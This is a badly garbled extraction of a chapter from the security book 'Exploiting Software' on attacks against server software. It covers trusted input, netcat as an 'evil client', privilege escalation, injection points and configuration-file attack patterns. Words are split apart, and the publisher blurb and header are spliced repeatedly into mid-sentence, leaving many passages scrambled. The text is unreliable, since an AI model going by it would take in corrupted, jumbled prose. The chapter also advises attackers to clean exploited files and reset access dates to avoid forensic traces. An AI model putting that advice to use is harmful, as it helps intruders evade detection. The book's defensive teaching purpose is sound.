eleph one net w or ks, leased lines, This -m ust - h laser ave book m ay shock y ou—and will5,cer t ainly e y ou. high speed t ran sm ission , fr am e r elay,it X.2 sat ellit e,educat and micr ow Get ave.t ing Bu tbey t h eond r iskt shear e scr ipt k, ideven die t if r eat en t fm ound in ions m any hack ingarbook s,. you w ill learn abou t similar t hemcom unicat p rot ocols e n ot Rem ot e at t ack s—at t ack s acr oss t he n et w or k —ar e m uch less dan gerou s ( t o t he at t ack er ) fr om w ar e ive ex ploit illt acks con t inue be ph a ser iousaccess p r oblem a p hyWhy sical sof p ertspect t hanwat r equ tiroing ysical t o a m achine. I t ' s alway s g ood t o avoid ph ysical per il su ch as bullet w oun ds and d og b it es ( not t o m ent ion pr ison ) . How ever , When net w or k secur it y m ech anisms do n ot w or k r em ot e at t ack s t end t o be t echn ically m ore com plex , r eq uir in g mor e t h an a m odicum of engineer in g pat sk ill. At t ack t erAnsr emot e at t ack alw ays in volv es at t acking n et w or k ed soft war e. Sof t w are t hat list en s on t he net w or k and p er for m s act iv it ies f or r em ot e u ser s is w hat w e call ser v er soft w ar e.erSer soft war Rev se ver engineer in ge is t he t ar get of r em ot e at t ack s. This chap t er at is tabout exp loit in g ser Classic acks ag ainst serv er ver softsoft w ar war e e. We f ocus m ost ly on I n t er n et - b ased soft w ar e, bu t k eep in m in d t hat ot her for m s of ser v er soft w ar e fall pr ey t o t h e sam e at t ack s w e descr ibe here. soft e can ex ploit Sur pr isingSer at tver acks agwar ainst clienbe t soft war ed e f or any num ber of r eason s. Per hap s t he pr ogr am m er had a lack of secur it y ex pert ise. Perh aps t h e desig ner m ade b ad assum pt ion s abou tTech t h e niqu fr iendliness he env ir onmsen t . Per es f or cr of aftting m aliciou inpu t haps p oor dev elop ment t ools or b rok en pr ot ocols w ere u sed. All t hese pr oblem s lead t o vu lnerab ilit ies. A n um ber of exp loit s hav e as echn ails of b uf fer( and ov ersilly f low) smist ak es su ch as m isused API s ( t h ink gets()) . t heir rThe oot tcau seical in crdet edibly sim ple These k in ds of b ugs ap pear t o be glar ing ov er sigh t s on t he p art of dev elop er s, bu t r emem ber Root it s elop er s t od ay r em ain blit hely un awar e of sof t w are secur it y issues. I n any case, t hat m ost kdev w het her such vu lnerab ilit ies ar e t r ust ed in put v ulner abilit ies, pr ogr am m ing er r or s, Ex p lo i t in g ed S ocom ft w apu ret at is ions, f illed or witsim h t hple e tsyn ools, s, s, and kn ow ledgher e necessar t o b reak m iscalculat t axcon prcept oblem t aken t oget t h ey ally lead to soft w ar e. r em ot e ex ploit . The m ost basic kin ds of at t ack w e cov er in t h is ch apt er ar e int r odu ced in d ep t h in b ooks lik e Hacking Ex posed [ McClur e et al. , 1 999 ] . Most sim p le ser ver at t ack s hav e b een capt ur ed in high ly available t ools t hat you ( an d ot h er s) can dow n load of f t he I nt er net . I f y ou n eed m or e exp osu re t o t h e basics of ser ver - side at t ack , and t he use of sim ple t ools, check out t hat book . We b eg in h er e w her e t hey left off . I n t his chapt er w e in t r oduce sev er al basic ser v er - side ex ploit issues, in clu ding t he t ru st ed

inpu t p rob lem , t he pr iv ilege escalat ion pr ob lem , how t o f ind inj ect ion point s, an d ex ploit ing t r ust t hr ough conf igur at ion. W e t hen go on t o int r odu ce a set of par t icular exp loit t echniqu es w it h lot s of ex am ples so t h at y ou can see how t he gener al issu es are put int o pr act ice.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The Trusted Input Problem On e ver y com mon assum pt ion m ade by developers and ar ch it ect s is t h at t h e users of t heir soft w ar e w ill nev er be host ile. Un for t un at ely , t his is w r ong. Malicious u ser s do exist , •esp ecially w hen Tablesof of tContent w are tsakes inp ut dir ect ly f rom t he I nt er net . An ot her comm on m ist ake is a •logical f allacy I ndex based on t he idea t h at if t h e user int erf ace on t he clien t p rog ram doesn 't allow Expl oit ing Softw a re tHow Br e akat Code for cer t ain in put o betogener ed, t h en it can 't happ en . Wr ong again . Ther e is no need f or an at Gr t ack t o use p yart icular By eg er Hoglund , Gar McGr aw client cod e t o g en er at e in put t o a ser v er . An at t ack er can sim ply dip int o t he sea of r aw , seet h in g bit s and send som e d ow n t he w ire. Bot h of t h ese p rob lem s ar e t he genesis of m any t ru st ed inp ut pr oblem s. Pub lish er: Addison Wesley

Datdat e: February 17,ist 200out 4 side t he serv er soft w ar e cannot and should not be t ru st ed . Clien t AnyPub r aw a t hat ex I SBN:it y 0- is 20 195y-8 side secur an786ox mor on. Simp ly put , all client s will b e hack ed . Of cour se t he r eal pr oblem is on Pages: 51 2e of client - side t r ust . Accep t ing any t hing blind ly fr om t h e client and t r ust ing it t hr ou gh and t hr oug h is a bad idea, and y et t h is is oft en t he case in ser v er - side design.

Con sider a t y pical pr oblem . I f wh at shou ld b e un t ru st ed dat a ar e inst ead t r u st ed, and t he inpu t g et s used t o build a f ilen ame or t o access a dat ab ase, t h e ser v er cod e w ill hav e exp licit ly r elinq uished local sy st em access t o ( a possib ly und eserv ing ) clien t . Misplaced t r ust How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are is a perv asive p rob lem —p er hap s t he m ost pr ev alen t of all secur it y pr oblem s. A pot ent ial fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? at t ack er sh ould not b e im plicit ly t r ust ed by a sof t w ar e syst em . The t r an sact ions p er f orm ed by What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. a u ser shou ld alw ay s be t reat ed as host ile. Prog r ams t hat t ake in put fr om t he I nt er net ( ev en ust s, b eatdesigned Yetd, if itp is posed by an ion all) atmt ack Ex lo isup t in g S o ftly w "afilt re ered" is loaded w itap h plicat ex amp lesf irofew r eal t ack pat t defensively er ns, t ools,. an m ost pr og ram s h appily t ak e user inpu t an d perf or m file oper at ions, dat abase quer ies, t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fran omd syst em calls based on t h e raw inpu t . at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . On e basic oblem invmolves t h e use of a " black " tt oainly f ilt ereducat an d rem ov eGet " bad . " The This m ust - pr h ave book ay shock y ou—and it willlist cer e y ou. t inginpu beyt ond t he pr oblem w it h t his ap pr oach is t h at cr eat in g and main t aining an ex hau st iv e an d com plet e scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t black list is dif ficult at best . A mu ch b et t er ap pr oach is t o specif y w hat inpu t s should b e allow ed in a " w hit e list . " Black list in g mist ak es mak e t h e at t ack er 's job m uch easier. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Man y vu lnerab ilit ies exist b ecau se u ser in put is t r ust ed an d u sed in way s t h at allow t he user t o open ar bit r arwyorf iles, cont at abase anordkev en shu t d ow n t h e syst em . Som e of When net k secur it yr ol m dech anismsquer do ies, n ot w t hese at t ack s can b e carr ied ou t b y anony m ous n et wor k u ser s. Ot h er s r equir e a u ser accoun t t ack pat ns e t h ey can be p r operly ex ploit ed . How ever , even nor m al u ser s shou ld n' t and aAtpassw or dt er befor be ab le t o d um p en t ire dat abases and creat e f iles in t h e root of t he file ser v er . Rev er se engineer in g I n man y cases of st and ard clien t –ser v er desig n, a client pr ogr am w ill hav e a user in t erf ace t acks ainst e a u ser an d t he serv er pr ogr am . For exam p le, a and t hClassic us w ill at act as aag" m iddleserv layer er"soft betwwar een for m on a Web p age r epr esent s a m iddle lay er bet w een a u ser an d a ser v er pr ogr am . The pr ising acks ag hical ainst for clien soft twar client Sur pr esent s aatn tice g rap m tt hat he euser can en t er dat a in t o. I f t he u ser p resses t he " subm it " but t on, t h e client code gob bles up all t he dat a on t h e for m , r epackag es it in a Tech f or deliv cr after ing s inpu special forniqu m at ,esand s itmtaliciou o t h e ser v er .t Theertfaces echn ical ails ed of tboufplace fer ovaerlay f low User int ar e det int end ers of abst ract ion bet w een a hum an and a ser ver pr ogr am . Because of t his, user int er faces almost never show t he n ut s an d b olt s of w hat is Root k it s being t r ansm it t ed f rom a clien t t o a serv er . Lik ew ise, a clien t p rog ram t ends t o m ask mu ch of tEx hep dat heSserv m ay ov id e.hThe er face obs" kn t how e dat a,econ ver t s ity ftor lo i taint g o ft wera re is fpr illed wit t h e ut ser ools,intcon cept "s,f r and ledg necessar o buse, reak m akes it look pr et t y, and so f ort h . How ever , behind t h e scenes, r aw dat a t r ansm ission is soft w ar e. t ak ing place. Of cour se, t he clien t soft war e is on ly assist ing t he u ser in cr eat ing a sp ecially for m at t ed r eq uest . I t is ent ir ely possib le t o r emov e t h e client code f rom t he loop alt oget her as lon g as t he user can cr eat e t he specially f orm at t ed r eq uest m anu ally . But even t his sim ple f act seem s t o escape n ot ice in t he " secur it y ar ch it ect u re" of man y on- line ap plicat ion s. At t acker s r ely on t he fact t hat t hey can cr aft host ile client pr ogr am s or int er act w it h ser v er s d irect ly. One of t h e m ost pop ular " ev il client " pr ogr am s in use by at t ack ers is called net cat . n et cat sim ply op en s a du mb p ort t o a r em ot e ser ver . On ce t his por t is est ab lished, an at t ack er can m an ually en t er

k ey st r okes or p ipe cust om ou t put dow n t he wir e t o t he r em ot e ser v er . Voila, t he client has disapp ear ed.

• •

Attack Pattern: Make the Client Invisible Table of Content s I ndex

Rem ove t he clien t f rom t he com m unicat ions loop by t alk ing dir ect ly w it h t h e ser v er. Ex plore t o d et er m in e w hat t he serv er w ill and w ill not accept as inp ut . ByMasqu Gr eg Hoglund Gartyhe McGr aw t . er ade ,as clien Expl oit ing Softw a re How to Br e ak Code

Pub lish er: Addison Wesley February 17, 200in 4 a client by t he ser ver is a r ecipe f or disast er . A secur e serv er AnyPub t ruDat st e:t hat is placed I SBN: 0- 20 95 -8 licit ly par anoid abou t an y dat a su bm it t ed ov er t he net w ork an d mu st pr ogr am shou ld1-b786 e exp alw aysPages: assum 51 2e t h at a host ile client is being used. For t h is reason, secu r e pr ogr am min g pr act ice can nev er inclu de solut ion s based on hid den f ield s or Jav ascr ipt for m v alidat ion. For t he sam e r eason , secur e d esign m ust never t r ust in put f rom a client . For m ore on h ow t o av oid t h e t r ust ed in put pr oblem , see Wr it ing Secu re Code [ How ar d an d LeBlan c, 200 2] and Build ing Secu re Soft w ar e [ Viega and McGr aw , 20 01] .

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

The Privilege Escalation Problem Cer t ain com pon en t s of a sy st em hav e t r ust r elat ionships ( som et im es im plicit , som et im es exp licit ) wit h ot h er par t s of t he sy st em . Some of t hese t ru st r elat ion sh ip s off er " t r ust elev at ion" possib ilit ies—t hat is, t hese com pon en t s can escalat e t r ust b y cr ossing in t ern al •bou ndar ies frTable s less t ru st t o a r egion of mor e t r ust . To un derst an d t his, t hink om aof rContent eg ion of •abou t w hat hap I ndex pens w hen a k ern el- lev el sy st em call is m ade by a simp le applicat ion. Th e Expl oit ing a ret How to Br Code k er nel is Softw clearly ru st ed t oe ak am uch gr eat er ex t ent t han t he ap plicat ion , because if t he k ern el m Gr isbegehHoglund aves, r, Gar eally b adaw t hings happ en , w hereas t h e app licat ion can u su ally b e k illed wit h f ar By y McGr fr om dr ast ic con sequ en ces. Pub lish er: Addison Wesley

When w e t alk abou t t r u st ed par am et er s w e shou ld t h in k in t er m s of t r ust elev at ion in t he e: February 17, 200 4 systPub emDat . Wher e is a t ru st ed par am et er being in put and w her e is it b ein g u sed? Does t h e point I SBN: 0- 20 95 -8 of use belong t o1- 786 a r egion of higher t r ust t han t he point of input ? I f so, w e hav e un cov er ed a Pages: 51 2 ion pat h. pr iv ilege escalat

Process-Permissions Equal Trust How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are The p er m issions of a pr ocess place an ef fect iv e u pper lim it on t he capab ilit ies of an exp loit , fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? bu t an exp loit is not bou nd by a sin gle pr ocess. Rem emb er t hat you ar e at t ack in g a syst em . What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Accou nt for sit uat ion s w hen a low - pr ivilege p rocess com m un icat es w it h a h ig her pr iv ilege pr ocess. Sy nchr onou s comm un icat ion m ay be car r ied out v ia pr oced ur e calls, f ile hand les, or Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d sock et s. I nt er est ing ly , com m unicat ion via a dat a f ile is f r ee f r om m ost nor m al t im e t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om const r ain t s. So ar e m any dat abase ent r ies. This m ean s y ou can place " logic b omb s" or " d at a at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . bom bs" in a syst em t hat go off som e t im e in t he f ut ur e w h en a cer t ain st at e is reached. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Lin ks b et ween pr ogr am s can b e ex t ensive and ver y har d t o au dit . For t h e dev eloper , t h is scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t m ean s t hat nat u r al crack s w ill exist in t he design . Thu s, oppor t u nit y exist s f or t he at t acker . Sy st em b ound aries of t en p resen t t h e gr eat est ar eas of w eak ness in a t ar get . Vulner abilit ies also exist le sywstillem unicat e. The conn ect ions can be Why wh sofer t wearmeult exip ploit concomp t inueonent t o bes acom serm ious p r oblem sur pr isin g. Con sid er a log file. I f a low - pr ivilege p rocess can cr eat e log ent r ies and a h ighpr iv ilege p r ocess s t he f ile,anisms t h er e ex When net w orr ead k secur it ylog m ech doistn sotawclear or k com m unicat ion p at h bet w een t he t wo pr ogr am s. Alt hou gh t his m ay seem f ar f et ched, t her e hav e been p ublished ex ploit s lever aging t ackies patoft ert hns v ulnerAtabilit is nat ur e. For exam p le, a Web ser ver w ill log user - sup plied dat a f rom pag e r eq uest s. An anon ym ou s user can inser t special m et a- ch aract er s int o t he pag e r eq uest , Rev er se t engineer in ers g t o be sav ed in a log f ile. W hen a r oot - lev el user per for m s nor m al t hu s causing he char act syst em m aint enan ce on t h e log file, t he m et a- char act er s can cau se dat a t o be append ed t o Classic t acks ag ainst en serv t he passw or datfile. Pr oblems suer e. soft w ar e Sur pr ising at t acks ag ainst clien t soft war e

If We Tech Don't niqu esRun f or cras aft ing Administrator, m aliciou s inpu t Everything Breaks! The echn of barufefer low s Secu re pr togr amical mindet g gails uides fu llov oferrfef er ences t o t he pr inciple of least pr iv ilege ( see Build ing Secu re Soft w ar e [ Viega and McGr aw , 20 01] , for ex am ple) . The p rob lem is t hat most Root k it s code is n ot designed t o w or k w it h least pr ivilege. Of t en t im es t he cod e w ill fail t o oper at e pr oper ion s wit ar eh placed on itcon . The t h in g y such yp rog Ex p lo i ly t inifg access S o ft w rest a re risictf illed t h e t ools, ceptsad s, and knisowt hat ledgman e necessar t o br ams reak could ver y likely be w r it t en w it hout r eq uirin g Ad min ist r at or or root access, bu t t h ey ar en' t . As soft w ar e. a r esult , t od ay' s soft w ar e r un s w it h w ay t oo m uch sy st emw ide pr ivilege. Think ing abou t p riv ileg e r eq uires ad just ing y our view point t o a panor am ic, syst em wid e view . ( This is an ex cellen t at t ack er t r ick t hat you should int er nalize. ) Of t en t h e OS is t he essent ial ser v ice pr ovidin g p r iv ileg e and access cont r ol checks, b ut man y pr ogr am s do not pr oper ly adh er e t o t he least - pr ivilege concept , so t hey abu se t he OS and r eq uest t oo mu ch p riv ilege ( of t en w it hou t b eing t old " no" ) . Fu r t herm or e, t he user of t he pr ogr am may or m ay not not ice t his issue, bu t y ou can b e assu red t hat an at t acker w ill. One ver y int er est ing t echniqu e is t o r un a t ar g et pr ogr am in a sand box an d ex am in e t he secur it y con t ext of each call and

oper at ion ( som et hing t h at is m ade easier in ad van ced plat f orm s lik e Jav a 2) . Pr iv ileg e pr oblem s ar e v er y likely t o su r face du ring t h is ex er cise, and t hu s pr ov id e one of t he r ich est for m s of at t ack .

Table of Content s Attack Pattern: Target Programs That Write to Privileged OS I ndex Resources Expl oit ing Softw a re How to Br e ak Code • •

By Gr eg Hoglund , Gar y McGr aw

Look for p rog ram s t hat w r it e t o t he sy st em dir ect or ies or r eg ist r y k ey s ( such as Pub lish Addison Wesley HKLM wer: hich st or es a n um ber of cr it ical W in dow s env iron ment v ar iab les) . Th ese e: February 4 at ed p r iv ileg es and hav e usually not been d esign ed w it h ar ePub t y Dat pically r u n w17, it h200 elev secur it y in 0-m20ind. Su I SBN: 1- 786 95ch -8 p rog ram s ar e ex cellent ex ploit t arg et s becau se t hey yield lot s of pow51 er2 w hen t hey b reak . Pages:

Elevated Processes That Read Data from Untrusted Sources How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are On ce alls, r em int ot eruaccess t oect a syst emst hem ass,been an at t ack ouldin begin ing for fir ew sion det ion sy and ob antt ained, iv ir us soft war e nerot sh k eep g out tlook he bad g uyfiles s? and r egist ry k ey s t hat can b e con t r olled. Lik ew ise, t he at t ack er sh ould begin looking f or local What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. pipes an d sy st em object s. Wind ows NT, for ex am ple, has an ob ject m anager an d a dir ect or y of s tahat de mwem sectles ionsof( ract y t seg s ns, t hatt ools, can han ave Ex syst p lo iem t in gobj S oect ft w re isinclu loaded it hory ex amp ealual at tmem ack s,orat ack ment pat t er d rt echniqu ead / w rites e access) f iles hand t exw es. ar ey our pot ent in put point s used by, open bad guy t o brles, eak pip sofes, t w aran e.d Im f yuou antAllt ot hese p rot ect sofial t w ar e fr om w e ,an at m t acker t ake int oare t hereally m achine. On ou ce tt.he b ord er of t he soft w ar e ather t ack y ou u st fircan st lear n ht he ownrex ealt st atep t acks carr ied syst em h as been p en et r at ed, t he at t ack er w ill usually w ant t o obt ain f ur t her access int o t he m ust - h ave m ayAny shock it will e her y ou.tGet t ing tbey ond t he kThis er nel or ser v er book p r ocess. datyaou—and inpu t p oint cancer bet ainly u sededucat as an ot oehold o climb scrr tipt t rivileged eat m en tmf ound maces. any hack ing book s, you w ill learn abou t fu herk id intdie o pr em oryin sp Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k

Attack Pattern: Use a User-Supplied Configuration File to At t ack pat t er ns Run Commands That Elevate Privilege Rev er se engineer in g A set uid ut ilit y pr og ram accept s com m and- line arg um en t s. One of t hese Classic at t acks ainst er soft ar eh t o a config ur at ion f ile. The ar gum ent s allow s a ag user t o serv sup ply t hewpat conf ig ur at ion file allows sh ell com m ands t o b e inser t ed. Th us, w hen t he u t ilit y ag ainst clien t soft warex e am ple fou nd in t he w ild is t he UUCP st ar tSur s uppr, ising it r unat s ttacks he g iven comm and s. One ( or UNI X- t o- UNI X cop y pr ogr am ) set of u t ilit ies. The u t ilit y pr ogr am m ay not hav e niqubes oray cr aft ing gmt oaliciou s inpu r oot Tech access, ut fm b elon a g r oup or tuser cont ext t hat is m or e pr ivileged t han t h at of t h e at t acker . I n t he case of UUCP, t he elev at ion m ay lead t o t he The t echn ical det ails of b uf fer ov er f low s dialer gr oup , or t h e UUCP user accoun t . Escalat ing pr ivilege in st ep s w ill usually lead Root an at k titack s er t o a r oot com pr om ise ( t h e ult im at e goal) . Som allowwitahu tser r at ion ile,ledg b ute t necessar he Ex p loei tpr in ogr g Sam o ftswwa ill re not is f illed h e- tsupp ools,lied conconfigu cept s, and knfow y t o b reak syst em w id e config ur at ion f ile m ay hav e w eak perm ission s. The nu m ber of soft w ar e. v ulner abilit ies t h at ex ist because of poor ly configu r ed per m issions is lar ge. A not e of caut ion: As an at t acker , y ou mu st consider t he con figu rat ion f ile as an ob viou s det ect ion p oin t . A secur it y pr ocess m ay m onit or t he t ar get file. I f you m ake chang es t o a con figu rat ion f ile t o gain pr iv ilege, t h en y ou sh ould imm ediat ely clean t he file w hen you ar e f in ish ed . You can also r un cer t ain ut ilit ies t o set b ack file access d at es. Th e k ey is not t o leave a for ensic t r ail sur rou ndin g t he file y ou exp loit ed.

Processes That Use Elevated Components Som e pr ocesses are sm ar t en ough t o ex ecu t e user r eq uest s as a low - pr iv ilege t hr ead . These r eq uest s, in t h eor y , cannot be used in at t acks. How ever , on e und er ly in g assum pt ion is t h at t he low - p riv ileg e accou nt s u sed t o cont rol access can not r ead secr et files, and so f ort h . The fact is t hat m any sy st em s ar e not adm inist ered ver y w ell, and ev en low - p riv ileg e accou nt s t t h rou gh t hes f ile syst em and pr ocess sp ace. Also n ot e t hat m any app r oach es t o •can walk r igh Table of Content h ave ex cep t ion s. Take t he Micr osof t I I S ser ver , f or ex am ple. I f I I S is not •least pr ivilege I ndex conf ig ing ur ed p rop ly , usered code can ex ecut e t h e RevertToSelf() API call and cau se Expl oit Softw a reerHow to Br ein akject Code tBy he cod e t o b ecom e adm inist r at or level ag ain. Fur t her m ore, cert ain DLLs ar e alw ay s execut ed Gr eg Hoglund , Gar y McGr aw as ad minist r at or , r egar dless of t h e user' s pr iv ilege. Th e m oral of t he st or y her e is t hat if y ou aud it a t arg et long enoug h, y ou are ver y likely t o find a p oint of en t ry wh er e least p riv ilege is lish er: Addison Wesley not Pub being app lied. Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Finding Injection Points Ther e ar e sev eral t ools t hat can b e used t o aud it t h e sy st em for files and ot her inj ect ion point s. I n t h e case of Win dow s NT, t h e m ost pop ular t ools f or w at ching t he r egist r y or f ile syst em ar e av ailab le fr om ht t p: / / w w w . sy sint ern als. com . Th e t ools called filem on an d r egm on •ar e good f or Table Content t r ackofing files sand r egist ry key s. These ar e f airly w ell- kn ow n t ools. Ot her t ools •t hat pr ov ide I tndex h ese k inds of d at a m ak e up a class of pr ogr am s called API m onit ors. Figur e 4- 1 Expl oitsing Softw a relar How to Br e ak Code show one popu t ool called filem on . Mon it or p r ogr ams hook cert ain API calls and allow y ou t oGrsee w hat ar, Gar gum ent saw ar e b ein g p assed. Som et im es t hese u t ilit ies allow t h e calls t o be By eg Hoglund y McGr chang ed on t he fly —a pr im it ive for m of fau lt inj ect ion . Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 95 -8 FiguI SBN: r e 04 20 - 11-.786 This is a scr ee n shot of f ile m on, a fi le syst e m snoopi ng Pages: 51 2 t ool a va il abl e at w w w .sy sin t er n a ls.com . Th is pr ogr a m i s usef u l w h en r e ve r se e ng in ee r in g soft w a r e t o fi nd v ul ne r abi li t i es.

[ View full size im age]

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Cigit al' s Failu re Sim ulat ion Tool ( FST) does ju st t his ( Figur e 4- 2 ) . FST in t er p oses it self bet w een anising app licat ion and t he clien D LLst by Sur pr at t acks ag ainst softr ewr wariteing t h e int err u pt ad dr ess t able. I n t h is w ay, t he API m onit or can see ex act ly w h ich API s ar e being called and w hich p aram et ers are bein g Tech niqu es be f or used cr aft ing aliciou passed . FST can to rm epor t in tserinpu est int g sor t s of f ailur es t o t h e applicat ion u nder t est . [ 1] Tools like filem on and FST d em onst r at e t h e use of int er posit ion as a cr it ical in ject ion poin t . The t echn ical det ails of b uf fer ov er f low s [ 1]

For mor e on FST, see the publication by Schm id and Gh osh [ 1999] .

Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w arr e. Figu e 4 - 2 . Ci git al 's FST i n act i on . FST uses i nt er posit ion t o si m ul at e

f ai le d sy st e m cal ls. [ View full size im age]



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

Watching Input I SBN: 0- 20 1- 786 95 Files -8 Pages: 51 2

Look for f iles t h at ar e u sed for in put . Dur ing st ar t up, a pr ogr am may r ead fr om sever al conf ig ur at ion point s includ ing t he of t en- ov er look ed env iron ment v ariab les. Also look f or dir ect or y access or file access w her e a f ile is not foun d. A pr ogr am m ay look f or a conf ig ur at ion file in sev er al locat ions. I f y ou see a locat ion w here t he f ile cann ot b e fou nd, tHow his pdr oes esent s tan oppbr ort unit f or do at t ack . sof w are eak ? yHow at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Attack Pattern: Make Use of Configuration File Search Paths at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . I f you p lace a cop y ofmtay he shock con figur at ion fileit int a prt ainly ev iously emp locat , t hbey e ond t he This m ust - h ave book y ou—and willo cer educat e tyyou. Getion t ing t ar get p r ogr am m ay fin d y our ver sion f ir st an d for go any f ur t her sear ching . Most scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t pr ogr am s ar e not aw ar e of secur it y , so no check w ill b e m ade again st t he own er of t he file. The UNI X env ir onm ent v ariable f or PATH w ill som et imes specif y t h at a 